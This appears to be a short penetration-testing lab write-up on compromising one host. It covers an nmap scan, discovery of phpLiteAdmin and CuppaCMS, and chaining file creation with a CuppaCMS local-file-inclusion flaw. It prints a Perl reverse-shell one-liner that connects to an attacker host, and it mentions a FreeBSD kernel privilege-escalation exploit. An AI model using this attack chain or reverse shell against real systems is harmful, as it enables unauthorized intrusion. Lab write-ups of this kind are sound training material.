Quick_10.11.1.116.nmap 10.11.1.116 Nmap scan report for 10.11.1.116 Host is up (0.27s latency). Not shown: 836 closed ports, 158 filtered ports Some closed ports may be reported as filtered due to –defeat-rst-ratelimit PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 110/tcp open pop3 143/tcp open imap 3306/tcp open mysql MAC Address: 00:50:56:89:1E:9B (VMware)

dirbuster found two webapps on port80

one is phpLiteadmin and one is CuppaCMS

phpLiteAdmin v1.9.3 able to create file with any extension

test.php created in

Cuppa CMS has a LFI vuln and could execute file on the box

use dkg_info to check installed packges. and perl was installed

use

perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,”attackerip:4444”);STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

get reverse shell

uname -r found OS is freebsd 9.0

kernel PE exp found.